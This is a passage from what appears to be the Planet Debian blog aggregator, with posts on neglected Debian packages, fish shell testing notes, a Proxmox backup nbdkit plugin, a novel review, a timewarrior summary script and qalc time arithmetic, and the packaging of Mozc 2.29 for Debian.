 wap-wml-tools               | 0.0.4-7                 | 2013-08-21 16:19:10+00
 ttysnoop                    | 0.12d-6                 | 2013-08-24 17:33:09+00
 libkaz                      | 1.21-2                  | 2013-09-02 16:00:10+00
 rarpd                       | 0.981107-9              | 2013-09-02 19:48:24+00
 libimager-qrcode-perl       | 0.033-1.2               | 2013-09-04 21:06:31+00
 dov4l                       | 0.9+repack-1            | 2013-09-22 19:33:25+00
 textdraw                    | 0.2+ds-0+nmu1           | 2013-10-07 21:25:03+00
 gzrt                        | 0.8-1                   | 2013-10-08 06:33:13+00
 away                        | 0.9.5+ds-0+nmu2         | 2013-10-25 01:18:18+00
 jshon                       | 20131010-1              | 2013-11-30 00:00:11+00
 libstar-parser-perl         | 0.59-4                  | 2013-12-23 21:50:43+00
 gcal                        | 3.6.3-3                 | 2013-12-29 18:33:29+00
 fonts-larabie               | 1:20011216-5            | 2014-01-02 21:20:49+00
 ccd2iso                     | 0.3-4                   | 2014-01-28 06:33:35+00
 kerneltop                   | 0.91-1                  | 2014-02-04 12:03:30+00
 vera++                      | 1.2.1-2                 | 2014-02-04 21:21:37+00
(50 rows)

So there are 8 packages last uploaded to unstable in 2011, 12 packages in 2012 and 26 packages in 2013. I suspect their maintainers need help and we should all offer our assistance. I already contacted two of them and hope the rest of the Debian community will chip in to help too. We should ensure any Debian specific patches are passed upstream if they still exist, that the package is brought up to speed with the latest Debian policy, as well as ensure the source can built with the current compiler set in Debian.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

28 February, 2025 03:45PM

hackergotchi for Jonathan Dowland

Jonathan Dowland

printables.com feed

I wanted to follow new content posted to Printables.com with a feed reader, but Printables.com doesn't provide one. Neither do the other obvious 3d model catalogues. So, I started building one.

I have something that spits out an Atom feed and a couple of beta testers gave me some valuable feedback. I had planned to make it public, with the ultimate goal being to convince Printables.com to implement feeds themselves.

Meanwhile, I stumbled across someone else who has done basically the same thing. Here are 3rd party feeds for

The format of their feeds is JSON-Feed, which is new to me. FreshRSS and NetNewsWire seems happy with it. (I went with Atom.) I may still release my take, if I find time to make one improvmment that my beta-testers suggested.

28 February, 2025 12:26PM

hackergotchi for Joey Hess

Joey Hess

WASM Wayland Web (WWW)

So there are only 2 web browser engines, and it seems likely there will soon only be 1, and making a whole new web browser from the ground up is effectively impossible because the browsers vendors have weaponized web standards complexity against any newcomers. Maybe eventually someone will succeed and there will be 2 again. Best case. What a situation.

So throw out all the web standards. Make a browser that just runs WASM blobs, and gives them a surface to use, sorta like Wayland does. It has tabs, and a throbber, and urls, but no HTML, no javascript, no CSS. Just HTTP of WASM blobs.

This is where the web browser is going eventually anyway, except in the current line of evolution it will be WASM with all the web standards complexity baked in and reinforcing the current situation.

Would this be a mass of proprietary software? Have you looked at any corporate website's "source" lately? But what's important is that this would make it easy enough to build new browsers that they would stop being a point of control.

Want a browser that natively supports RSS? Poll the feeds, make a UI, download the WASM enclosures to view the posts. Want a browser that supports IPFS or gopher? Fork any browser and add it, the mantenance load will be minimal. Want to provide access to GPIO pins or something? Add an extension that can be accessed via the WASI component model. This would allow for so many things like that which won't and can't happen with the current market duopoly browser situation.

And as for your WASM web pages, well you can still use HTML if you like. Use the WASI component model to pull in a HTML engine. It doesn't need to support everything, just the parts of web standards that you want to use. Or you can do something entitely different in your WASM that is not HTML based at all but a better paradigm (oh hi Spritely or display postscript or gemini capsules or whatever).

Dual innovation sources or duopoly? I know which I'd prefer. This is not my project to build though.

28 February, 2025 06:37AM

Antoine Beaupré

testing the fish shell

I have been testing fish for a couple months now (this file started on 2025-01-03T23:52:15-0500 according to stat(1)), and those are my notes. I suspect people will have Opinions about my comments here. Do not comment unless you have some Constructive feedback to provide: I don't want to know if you think I am holding it Wrong. Consider that I might have used UNIX shells for longer that you have lived.

I'm not sure I'll keep using fish, but so far it's the first shell that survived heavy use outside of zsh(1) (unless you count tsch(1), but that was in another millenia).

My normal shell is bash(1), and it's still the shell I used everywhere else than my laptop, as I haven't switched on all the servers I managed, although it is available since August 2022 on torproject.org servers.. I first got interested in fish because they ported to Rust, making it one of the rare shells out there written in a "safe" and modern programming language, released after an impressive ~2 year of work with Fish 4.0.

Cool things

Current directory gets shortened, ~/wikis/anarc.at/software/desktop/wayland shows up as ~/w/a/s/d/wayland

Autocompletion rocks.

Default prompt rocks. Doesn't seem vulnerable to command injection assaults, at least it doesn't trip on the git-landmine.

It even includes pipe status output, which was a huge pain to implement in bash. Made me realized that if the last command succeeds, we don't see other failures, which is the case of my current prompt anyways! Signal reporting is better than my bash implementation too.

So far the only modification I have made to the prompt is to add a printf '\a' to output a bell.

By default, fish keeps a directory history (but separate from the pushd stack), that can be navigated with cdh, prevd, and nextd, dirh shows the history.

Less cool

I feel there's visible latency in the prompt creation.

POSIX-style functions (foo() { true }) are unsupported. Instead, fish uses whitespace-sensitive definitions like this:

function foo
    true
end

This means my (modest) collection of POSIX functions need to be ported to fish. Workaround: simple functions can be turned into aliases, which fish supports (but implements using functions).

EOF heredocs are considered to be "minor syntactic sugar". I find them frigging useful.

Process substitution is split on newlines, not whitespace. you need to pipe through string split -n " " to get the equivalent.

<(cmd) doesn't exist: they claim you can use cmd | foo - as a replacement, but that's not correct: I used <(cmd) mostly where foo does not support - as a magic character to say 'read from stdin'.

Documentation is... limited. It seems mostly geared the web docs which are... okay (but I couldn't find out about ~/.config/fish/conf.d there!), but this is really inconvenient when you're trying to browse the manual pages. For example, fish thinks there's a fish_prompt manual page, according to its own completion mechanism, but man(1) cannot find that manual page. I can't find the manual for the time command (which is actually a keyword!)

Fish renders multi-line commands with newlines. So if your terminal looks like this, say:

anarcat@angela:~> sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy

... but it's actually one line, when you copy-paste the above, in foot(1), it will show up exactly like this, newlines and all:

sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy

Whereas it should show up like this:

sq keyring merge torproject-keyring/lavamind-95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyring/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy

Note that this is an issue specific to foot(1), alacritty(1) and gnome-terminal(1) don't suffer from that issue.

Blockers

() is like $(): it's process substitution, and not a subshell. This is really impractical: I use ( cd foo ; do_something) all the time to avoid losing the current directory... I guess I'm supposed to use pushd for this, but ouch. This wouldn't be so bad if it was just for cd though. Clean constructs like this:

( git grep -l '^#!/.*bin/python' ; fdfind .py ) | sort -u

Turn into what i find rather horrible:

begin; git grep -l '^#!/.*bin/python' ; fdfind .py ; end | sort -ub

It... works, but it goes back to "oh dear, now there's a new langage again". I only found out about this construct while trying:

{ git grep -l '^#!/.*bin/python' ; fdfind .py } | sort -u 

... which fails and suggests using begin/end, at which point: why not just support the curly braces?

FOO=bar is not allowed. It's actually recognized syntax, but creates a warning. We're supposed to use set foo bar instead. This really feels like a needless divergence from standard.

Aliases are... peculiar. Typical constructs like alias mv="\mv -i" don't work because fish treats aliases as a function definition, and \ is not magical there. This can be worked around by specifying the full path to the command, with e.g. alias mv="/bin/mv -i". Another problem is trying to override a built-in, which seems completely impossible. In my case, I like the time(1) command the way it is, thank you very much, and fish provides no way to bypass that builtin. It is possible to call time(1) with command time, but it's not possible to replace the command keyword so that means a lot of typing.

Again: you can't use \ to bypass aliases. This is a huge annoyance for me. I would need to learn to type command in long form, and I use that stuff pretty regularly. I guess I could alias command to c or something, but this is one of those huge muscle memory challenges.

alt . doesn't always work the way i expect.

28 February, 2025 05:31AM

Michael Ablassmeier

proxmox backup nbdkit plugin round 2

I re-implemented the proxmox backup nbdkit plugin in C.

It seems golang shared libraries don’t play well with programs that fork().

As a result, the Plugin was only usable if nbdkit was run in foreground mode (-f), making it impossible to use nbdkit’s’ captive modes, which are quite useful.. Lessons learned.

Here is the C version

28 February, 2025 12:00AM

February 25, 2025

Divine Attah-Ohiemi

Re-styling Debian's Download Page

main points from this blog post:

I am tasked with contributing to the debianhugo project which aim is to re-design the old debian pages and make the content better accessible. We've since reached a significant milestone and migrated multiple pages including the start, intro, news and now the download page.

creating "simple" and "advanced" download pages

At first we made the "simple" download page:

  • target audience; less experienced users
  • only added more common download arhitectures/options i.e amd64-64 bit pc and arm64
  • descriptive content for easy user experience; listing positives and negatives of each option, adding download sizes
  • interactive download cards with iso, torrent and debian-cd mirror selections.

"advanced" download page:

  • more download architectures and options including testing release streams
  • straight to point content

challenges/issues while developing

The mirror selection option while it might help with faster downloads depending on the region is still somewhat a manual proccess on the user end and could come with various complications like the chosen debian-cd mirror not having the latest version of debian.

We're looking into testing if the delivery of the images/ISOs is also possible to be done through the Fastly CDN, this would prevent us to provide manual mirror selection.

25 February, 2025 09:54PM by Divine Attah-Ohiemi

Michael Ablassmeier

proxmox backup nbdkit plugin

nbdkit is a really powerful NBD toolkit.

Lately, i wanted to access VM backups from a Proxmox Backup Server via network (not by using the proxmox-backup-client map function..)

For example, to test-boot a virtual machine snapshot directly from a backup. NBD suits that usecase quite well, so i quickly put a nbdkit plugin together that can be used for this.

The available golang bindings for the proxmox backup client API, made that quite easy.

As nbdkit already comes with a neat COW plugin, its only been a few lines of go code resulting in: pbsnbd

25 February, 2025 12:00AM

February 24, 2025

Russ Allbery

Review: A Little Vice

Review: A Little Vice, by Erin E. Elkin

Publisher: Erin Elkin
Copyright: June 2024
ASIN: B0CTHRK61X
Format: Kindle
Pages: 398

A Little Vice is a stand-alone self-published magical girl novel. It is the author's first novel.

C is a high school student and frequent near-victim of monster attacks. Due to the nefarious work of Avaritia Wolf and her allies, his high school is constantly attacked by Beasts, who are magical corruptions of some internal desire taken to absurd extremes. Standing in their way are the Angelic Saints: magical girls who transform into Saint Castitas, Saint Diligentia, and Saint Temperantia and fight the monsters. The monsters for some reason seem disposed to pick C as their victim for hostage-taking, mind control, use as a human shield, and other rather traumatic activities. He's always rescued by the Saints before any great harm is done, but in some ways this makes the situation worse.

It is obvious to C that the Saints are his three friends Inessa, Ida, and Temperance, even though no one else seems able to figure this out despite the blatant clues. Inessa has been his best friend since childhood when she was awkward and needed his support. Now, she and his other friends have become literal heroes, beautiful and powerful and capable, constantly protecting the school and innocent people, and C is little more than a helpless burden to be rescued. More than anything else, he wishes he could be an Angelic Saint like them, but of course the whole idea is impossible. Boys don't get to be magical girls.

(I'm using he/him pronouns for C in this review because C uses them for himself for most of the book.)

This is a difficult book to review because it is deeply focused on portraying a specific internal emotional battle in all of its sometimes-ugly complexity, and to some extent it prioritizes that portrayal over conventional story-telling. You have probably already guessed that this is a transgender coming-out story — Elkin's choice of the magical girl genre was done with deep understanding of its role in transgender narratives — but more than that, it is a transgender coming-out story of a very specific and closely-observed type. C knows who he wishes he was, but he is certain that this transformation is absolutely impossible. He is very deep in a cycle of self-loathing for wanting something so manifestly absurd and insulting to people who have the virtues that C does not.

A Little Vice is told in the first person from C's perspective, and most of this book is a relentless observation of C's anxiety and shame spiral and reflexive deflection of any possibility of a way out. This is very well-written: Elkin knows the reader is going to disagree with C's internalized disgust and hopelessness, knows the reader desperately wants C to break out of that mindset, and clearly signals in a myriad of adroit ways that Elkin is on the reader's side and does not agree with C's analysis. C's friends are sympathetic, good-hearted people, and while sometimes oblivious, it is obvious to the reader that they're also on the reader's side and would help C in a heartbeat if they saw an opening. But much of the point of the book is that it's not that easy, that breaking out of the internal anxiety spiral is nearly impossible, and that C is very good at rejecting help, both because he cannot imagine what form it could take but also because he is certain that he does not deserve it.

In other words, much of the reading experience of this book involves watching C torture and insult himself. It's all the more effective because it isn't gratuitous. C's internal monologue sounds exactly like how an anxiety spiral feels, complete with the sort of half-effective coping mechanisms, deflections, and emotional suppression one develops to blunt that type of emotional turmoil.

I normally hate this kind of book. I am a happy ending and competence porn reader by default. The world is full of enough pain that I don't turn to fiction to read about more pain. It says a lot about how well-constructed this book is that I stuck with it. Elkin is going somewhere with the story, C gets moments of joy and delight along the way to keep the reader from bogging down completely, and the best parts of the book feel like a prolonged musical crescendo with suspended chords. There is a climax coming, but Elkin is going to make you wait for it for far longer than you want to.

The main element that protects A Little Vice from being too grim is that it is a genre novel that is very playful about both magical girls and superhero tropes in general. I've already alluded to one of those elements: Elkin plays with the Mask Principle (the inability of people to see through entirely obvious secret identities) in knowing and entertaining ways. But there are also villains, and that leads me to the absolutely delightful Avaritia Wolf, who for me was the best character in this book.

The Angelic Saints are not the only possible approach to magical girl powers in this universe. There are villains who can perform a similar transformation, except they embrace a vice rather than a virtue. Avaritia Wolf embraces the vice of greed. They (Avaritia's pronouns change over the course of the book) also have a secret identity, which I suspect will be blindingly obvious to most readers but which I'll avoid mentioning since it's still arguably a spoiler.

The primary plot arc of this book is an attempt to recruit C to the side of the villains. The Beasts are drawn to him because he has magical potential, and the villains are less picky about gender. This initially involves some creepy and disturbing mind control, but it also brings C into contact with Avaritia and Avaritia's very specific understanding of greed. As far as Avaritia is concerned, greed means wanting whatever they want, for whatever reason they feel like wanting it, and there is absolutely no reason why that shouldn't include being greedy for their friends to be happy. Or doing whatever they can to make their friends happy, whether or not that looks like villainy.

Elkin does two things with this plot that I thought were remarkably skillful. The first is that she directly examines and then undermines the "easy" transgender magical girl ending. In a world of transformation magic, someone who wants to be a girl could simply turn into a girl and thus apparently resolve the conflict in a way that makes everyone happy. I think there is an important place for that story (I am a vigorous defender of escapist fantasy and happy endings), but that is not the story that Elkin is telling. I won't go into the details of why and how the story complicates and undermines this easy ending, but it's a lot of why this book feels both painful and honest to a specific, and very not easy, transgender experience, even though it takes place in an utterly unrealistic world.

But the second, which is more happy and joyful, is that Avaritia gleefully uses a wholehearted embrace of every implication of the vice of greed to bulldoze the binary morality of the story and question the classification of human emotions into virtues and vices. They are not a hero, or even all that good; they have some serious flaws and a very anarchic attitude towards society. But Avaritia provides the compelling, infectious thrill of the character who looks at the social construction of morality that is constraining the story and decides that it's all bullshit and refuses to comply. This is almost the exact opposite of C's default emotional position at the start of the book, and watching the two characters play off of each other in a complex friendship is an absolute delight.

The ending of this book is complicated, messy, and incomplete. It is the sort of ending that I think could be incredibly powerful if it hits precisely the right chords with the reader, but if you're not that reader, it can also be a little heartbreaking because Elkin refuses to provide an easy resolution. The ending also drops some threads that I wish Elkin hadn't dropped; there are some characters who I thought deserved a resolution that they don't get. But this is one of those books where the author knows exactly what story they're trying to tell and tells it whether or not that fits what the reader wants. Those books are often not easy reading, but I think there's something special about them.

This is not the novel for people who want detailed world-building that puts a solid explanation under events. I thought Elkin did a great job playing with the conventions of an episodic anime, including starting the book on Episode 12 to imply C's backstory with monster attacks and hinting at a parallel light anime story by providing TV-trailer-style plot summaries and teasers at the start and end of each chapter. There is a fascinating interplay between the story in which the Angelic Saints are the protagonists, which the reader can partly extrapolate, and the novel about C that one is actually reading. But the details of the world-building are kept at the anime plot level: There's an arch-villain, a World Tree, and a bit of backstory, but none of it makes that much sense or turns into a coherent set of rules. This is a psychological novel; the background and rules exist to support C's story.

If you do want that psychological novel... well, I'm not sure whether to recommend this book or not. I admire the construction of this book a great deal, but I don't think appealing to the broadest possible audience was the goal. C's anxiety spiral is very repetitive, because anxiety spirals are very repetitive, and you have to be willing to read for the grace notes on the doom loop if you're going to enjoy this book. The sentence-by-sentence writing quality is fine but nothing remarkable, and is a bit shy of the average traditionally-published novel. The main appeal of A Little Vice is in the deep and unflinching portrayal of a specific emotional journey. I think this book is going to work if you're sufficiently invested in that journey that you are willing to read the brutal and repetitive parts. If you're not, there's a chance you will bounce off this hard.

I was invested, and I'm glad I read this, but caveat emptor. You may want to try a sample first.

One final note: If you're deep in the book world, you may wonder, like I did, if the title is a reference to Hanya Yanagihara's (in)famous A Little Life. I do not know for certain — I have not read that book because I am not interested in being emotionally brutalized — but if it is, I don't think there is much similarity. Both books are to some extent about four friends, but I couldn't find any other obvious connections from some Wikipedia reading, and A Little Vice, despite C's emotional turmoil, seems to be considerably more upbeat.

Content notes: Emotionally abusive parent, some thoughts of self-harm, mind control, body dysmorphia, and a lot (a lot) of shame and self-loathing.

Rating: 7 out of 10

24 February, 2025 05:04AM

Valhalla's Things

Hexagonal Pattern Weights

Posted on February 24, 2025
Tags: madeof:atoms, craft:3dprint, craft:sewing

Eight hexagonal pieces with free software / culture related graphics on top.

For quite a few years, I’ve been using pattern weights instead of pins when cutting fabric, starting with random objects and then mostly using some big washers from the local hardware store.

However, at about 22 g per washer, I needed quite a few of them, and dealing with them tended to get unwieldy; I don’t remember how it happened, but one day I decided to make myself some bigger weights with a few washers each.

I suspect I had seen somebody online with some nice hexagonal pattern weights, and hexagonal of course reminded me of the Stickers Standard, so of course I settled on an hexagon 5 cm tall and I decided I could 3D-print it in a way that could be filled with washers for weight.

Rather than bothering with adding a lid (and fitting it), I decided to close the bottom by gluing a piece of felt, with the added advantage that it would protect whatever the weight was being used on. And of course the top could be decorated with a nerdish sticker, because, well, I am a nerd.

I made a few of these pattern weights, used them for a while, was happy with them, and then a few days ago I received some new hexagonal stickers I had had printed, and realized that while I had taken a picture with all of the steps in assembling them, I had never published any kind of instructions on how to make them — and I had not even pushed the source file on the craft tools git repository.

And yesterday I fixed that: the instructions are now on my craft pattern website, with generated STL files, the git repository has been updated with the current sources, and now I’ve even written this blog post :)

24 February, 2025 12:00AM

February 23, 2025

hackergotchi for Colin Watson

Colin Watson

Qalculate time hacks

Anarcat recently wrote about Qalculate, and I think I’m a convert, even though I’ve only barely scratched the surface.

The thing I almost immediately started using it for is time calculations. When I started tracking my time, I quickly found that Timewarrior was good at keeping all the data I needed, but I often found myself extracting bits of it and reprocessing it in variously clumsy ways. For example, I often don’t finish a task in one sitting; maybe I take breaks, or I switch back and forth between a couple of different tasks. The raw output of timew summary is a bit clumsy for this, as it shows each chunk of time spent as a separate row:

$ timew summary 2025-02-18 Debian

Wk Date       Day Tags                            Start      End    Time   Total
W8 2025-02-18 Tue CVE-2025-26465, Debian,       9:41:44 10:24:17 0:42:33
                  next, openssh
                  Debian, FTBFS with GCC-15,   10:24:17 10:27:12 0:02:55
                  icoutils
                  Debian, FTBFS with GCC-15,   11:50:05 11:57:25 0:07:20
                  kali
                  Debian, Upgrade to 0.67,     11:58:21 12:12:41 0:14:20
                  python_holidays
                  Debian, FTBFS with GCC-15,   12:14:15 12:33:19 0:19:04
                  vigor
                  Debian, FTBFS with GCC-15,   12:39:02 12:39:38 0:00:36
                  python_setproctitle
                  Debian, Upgrade to 1.3.4,    12:39:39 12:46:05 0:06:26
                  python_setproctitle
                  Debian, FTBFS with GCC-15,   12:48:28 12:49:42 0:01:14
                  python_setproctitle
                  Debian, Upgrade to 3.4.1,    12:52:07 13:02:27 0:10:20 1:44:48
                  python_charset_normalizer

                                                                         1:44:48

So I wrote this Python program to help me:

#! /usr/bin/python3

"""
Summarize timewarrior data, grouped and sorted by time spent.
"""

import json
import subprocess
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from operator import itemgetter

from rich import box, print
from rich.table import Table


parser = ArgumentParser(
    description=__doc__, formatter_class=RawDescriptionHelpFormatter
)
parser.add_argument("-t", "--only-total", default=False, action="store_true")
parser.add_argument(
    "range",
    nargs="?",
    default=":today",
    help="Time range (usually a hint, e.g. :lastweek)",
)
parser.add_argument("tag", nargs="*", help="Tags to filter by")
args = parser.parse_args()

entries: defaultdict[str, timedelta] = defaultdict(timedelta)
now = datetime.now(timezone.utc)
for entry in json.loads(
    subprocess.run(
        ["timew", "export", args.range, *args.tag],
        check=True,
        capture_output=True,
        text=True,
    ).stdout
):
    start = datetime.fromisoformat(entry["start"])
    if "end" in entry:
        end = datetime.fromisoformat(entry["end"])
    else:
        end = now
    entries[", ".join(entry["tags"])] += end - start

if not args.only_total:
    table = Table(box=box.SIMPLE, highlight=True)
    table.add_column("Tags")
    table.add_column("Time", justify="right")
    for tags, time in sorted(entries.items(), key=itemgetter(1), reverse=True):
        table.add_row(tags, str(time))
    print(table)

total = sum(entries.values(), start=timedelta())
hours, rest = divmod(total, timedelta(hours=1))
minutes, rest = divmod(rest, timedelta(minutes=1))
seconds = rest.seconds
print(f"Total time: {hours:02}:{minutes:02}:{seconds:02}")
$ summarize-time 2025-02-18 Debian

  Tags                                                     Time
 ───────────────────────────────────────────────────────────────
  CVE-2025-26465, Debian, next, openssh                 0:42:33
  Debian, FTBFS with GCC-15, vigor                      0:19:04
  Debian, Upgrade to 0.67, python_holidays              0:14:20
  Debian, Upgrade to 3.4.1, python_charset_normalizer   0:10:20
  Debian, FTBFS with GCC-15, kali                       0:07:20
  Debian, Upgrade to 1.3.4, python_setproctitle         0:06:26
  Debian, FTBFS with GCC-15, icoutils                   0:02:55
  Debian, FTBFS with GCC-15, python_setproctitle        0:01:50

Total time: 01:44:48

Much nicer. But that only helps with some of my reporting. At the end of a month, I have to work out how much time to bill Freexian for and fill out a timesheet, and for various reasons those queries don’t correspond to single timew tags: they sometimes correspond to the sum of all time spent on multiple tags, or to the time spent on one tag minus the time spent on another tag, or similar. As a result I quite often have to do basic arithmetic on time intervals; but that’s surprisingly annoying! I didn’t previously have good tools for that, and was reduced to doing things like str(timedelta(hours=..., minutes=..., seconds=...) + ...) in Python, which gets old fast.

Instead:

$ qalc '62:46:30 - 51:02:42 to time'
(225990 / 3600) − (183762 / 3600) = 11:43:48

I also often want to work out how much of my time I’ve spent on Debian work this month so far, since Freexian pays me for up to 20% of my work time on Debian; if I’m under that then I might want to prioritize more Debian projects, and if I’m over then I should be prioritizing more Freexian projects as otherwise I’m not going to get paid for that time.

$ summarize-time -t :month Freexian
Total time: 69:19:42
$ summarize-time -t :month Debian
Total time: 24:05:30
$ qalc '24:05:30 / (24:05:30 + 69:19:42) to %'
(86730 / 3600) / ((86730 / 3600) + (249582 / 3600)) ≈ 25.78855349%

I love it.

23 February, 2025 08:00PM by Colin Watson

Iustin Pop

Still alive, but this blog not really

Sigh, sometimes I really don’t understand time. And I don’t mean, in the physics sense.

It’s just, the days have way fewer hours than 10 years ago, or there’s way more stuff to do. Probably the latter 😅

No time for real open-source work, but I managed to do some minor coding, released a couple of minor version (as upstream), and packaged some refreshes in Debian. The later only because I got involved, against better judgement, into some too heated discussions, but they ended well, somehow. But the whole episode motivated me to actually do some work, even if minor, than just rant on mailing lists 🙊.

My sports life is still pretty erratic, but despite some repeated sickness (my fault, for not sleeping well enough) and tendon issues, there are months in which I can put down 100km. And the skiing season was really awesome.

So life goes on, but I definitely am not keeping up with entropy, even in simple things such as my inbox. One day I’ll make real blog post, not just an update, but in the meantime, it is what it is.

And yes, running 10km while still sick just because you’re bored is not the best idea. According to a friend, of course, not to my Strava account.

23 February, 2025 03:20PM

hackergotchi for Kentaro Hayashi

Kentaro Hayashi

Short journey to Mozc 2.29.5160.102+dfsg-1

Introduction

This is just a note-taking about how to upgrading Mozc package for up-coming trixie ready (with many restrictions) last year.

Maybe Mozc 2.29.5160.102+dfsg-1.3 will be shipped for Debian 13 (trixie).

FTBFS with Mozc 2.28.4715.102+dfsg-2.2

In May 2024, I've found that Mozc was removed from testing, and still in FTBFS.

#1068186 - mozc: FTBFS with abseil 20230802: ../../base/init_mozc.cc:90:29: error: ‘absl::debian5::flags_internal::ArgvListAction’ has not been declared - Debian Bug report logs

That FTBFS was fixed in the Mozc upstream, but not applied for a while. Not only upstream patch, but also additional linkage patch was required to fix it.

Mozc is the de-fact standard input method editor for Japanese. Most of Japanese uses it by default on linux desktop.

(Even though frontend input method framework is different, the background engine is Mozc in most cases - uim-mozc for task-japanese-desktop, ibus-mozc for task-japanese-gnome-desktop in Debian)

There is a case that Mozc was re-built locally with integrated external dictionary to improve quantity of vocabulary. If FTBFS keep ongoing, it means that it blocks such a usage. So I've sent patches to fix it and they were merged.

Motivation to update Mozc

With fixing #1068186, I've also found Mozc version is not synced to upstream for a long time.

At that time, Mozc in unstable was version 2.28.4715.102+dfsg, but upstream already released 2.30.5544.102. It seems that Mozc's maintainer was too busy and can't afford to update it, so I've tried to do it.

The blockers for updating Mozc

But, it was not so easy task to do so. If you want to package latest Mozc, there were many blockers.

  • Newer Mozc requires Bazel to build, but there is no Bazel package to fit it (There is bazel-bootstrap 4.x, but it's old. v6.x or newer one is required.)
  • Newer abseil and protobuf were required
  • Renderer was changed to Qt. GTK renderer was removed
  • Revise existing patchsets (e.g. for UIM, for Fcitx)

It was not all.

Road to latest Mozc

First, I knew the existence of debian-bazel, so I've posted about bazel-packaging progress.

Any updates about bazel packaging effort?

Sadly there was no response from it. Thus, it was not realistic to adopt Bazel as build tool chain. In other words, we need to keep GYP patch and maintain it.

And as another topic, upstream changed renderer from GTK+ to Qt.

Here are the major topics about each release of Mozc.

  • 2.30.5544.102 Require abseil 20240116.1 or later
  • 2.29.5544.102 GYP was deprecated
  • 2.29.5374.102
  • 2.29.5268.102 No gtk renderer anymore, need Qt.
  • 2.29.5160.102
    • The last version that gtk renderer is available.
    • --use_gyp_for_ibus_build option was removed.
  • 2.28.5029.102
  • 2.28.4880.102
  • 2.28.4715.102+dfsg Debian sid

The internal renderer change are too big, and before GYP deprecation in 2.29.5544.102, GYP support was already removed gradually.

As a result, target to 2.29.5160.102 was the practical approach to make it forward.

Revisit existing patchsets for 2.28.4715.102+dfsg

Second, need to revisit existing patchset to triage them.

  • 0001-Update-uim-mozc-to-c979f127acaeb7b35d3344e8b1e40848e.patch
    • Required
  • 0002-Support-fcitx.patch
    • Required
  • 0003-Change-compiler-from-clang-to-gcc.patch
  • 0004-Add-usage_dict.txt.patch
    • Required. (maybe)
  • 0005-Enable-verbose-build.patch
    • Required.
  • 0006-Update-gyp-using-absl.patch
    • Required and need massive refactoring.
  • 0007-common.gypi-Use-command-v-instead-of-which.patch
    • (maybe) Not needed anymore
  • 0009-protobuf.gyp-Add-latomic-to-link_settings.patch
    • Required.
  • 0010-Fix-the-compile-error-of-ParseCommandLineFlags-with.patch
    • Required. Should be merged into 0006 patch.
  • 0011-Fix-missing-abseil-gyp-link-settings.patch
    • Required. Should be merged into 0006 patch.

UIM patch was maintained in third-party repository, and directory structure was quite different from Mozc. It seems that maintenance activity was too low, so it was not enough that picking changes from macuim. It was required to fix FTBFS additionally.

Fcitx patch was also maintained in fcitx/mozc. But it tracks only master branch, so it was hard to pick patchset for specific version of Mozc.

Finally, I could manage to refresh patchset for 2.29.5160.102.

  • support-uim.patch
  • support-fcitx.patch
  • change-compiler-from-clang-to-gcc.patch
  • add-japanese-usage-dictionary.patch
  • enable-verbose-build.patch
  • update-gyp-using-system-abseil.patch
  • gyp-using-command-instead-of-which.patch
  • gyp-protobuf-link-with-atomic.patch
  • enable-deprecated-gtk-renderer.patch
  • fix-compile-error-of-ParseCommandLineFlags.patch
  • enable-use_gyp_for_ibus_build-again.patch
  • ibus-drop-needless-client_mock.patch
  • protobuf-revert-internal-cleanup.patch
  • uim-mozc-fix-ftbfs.patch

Improve packaging task

Mozc need to be repacked, but it didn't use Files-Excluded yet. So I've introduced d/watch to repack upstream source.

It makes source package more reproducible.

OT: Hardware breakage

There was another blocker to do this task. I've hit the situation that g++ cause SEGV during building Mozc randomly. First, I wonder why it fails, but digging further more, finally I've found that memory module was corrupted. Thus I've lost 32GB memory modules. :-<

Unexpected behaviour in uim-mozc

When uploaded Mozc 2.29.5160.102+dfsg-1 to experimental, I've found that there is a case that uim-mozc behaves weird. The candidate words were shown with flickering.

But it was not regression in this upload.

uim-mozc with Wayland cause that problem.

Thus GNOME and derivatives might not be affected because ibus-mozc will be used.

Mozc 2.29.5160.102+dfsg-1

As the patchset was matured, then uploaded 2.29.5160.102+dfsg-1 with --delayed 15 option.

$ dput --delayed 15 mozc_2.29.5160.102+dfsg-1_source.changes
Uploading mozc using ftp to ftp-master (host: ftp.upload.debian.org; directory: /pub/UploadQueue/DELAYED/15-day)
running allowed-distribution: check whether a local profile permits uploads to the target distribution
running protected-distribution: warn before uploading to distributions where a special policy applies
running checksum: verify checksums before uploading
running suite-mismatch: check the target distribution for common errors
running gpg: check GnuPG signatures before the upload
 signfile dsc mozc_2.29.5160.102+dfsg-1.dsc 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3

 fixup_buildinfo mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
 signfile buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3

 fixup_changes dsc mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_source.changes
 fixup_changes buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo mozc_2.29.5160.102+dfsg-1_source.changes
 signfile changes mozc_2.29.5160.102+dfsg-1_source.changes 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3

Successfully signed dsc, buildinfo, changes files
Uploading mozc_2.29.5160.102+dfsg-1.dsc
Uploading mozc_2.29.5160.102+dfsg-1.debian.tar.xz
Uploading mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
Uploading mozc_2.29.5160.102+dfsg-1_source.changes

Mozc 2.29.5160.102+dfsg-1 was landed to unstable at 2024-12-20.

Additional bug fixes

Additionally, the following bugs were also fixed.

These bugs were fixed in 2.29.5160.102+dfsg-1.1

And more, I've found that even though missing pristine-tar branch commit, salsa CI succeeds. I've sent MR for this issue and already merged into.

Mozc and future in Debian

In this short journey, I gave up to updating more newer Mozc because the version of dependency libraries were not updated.

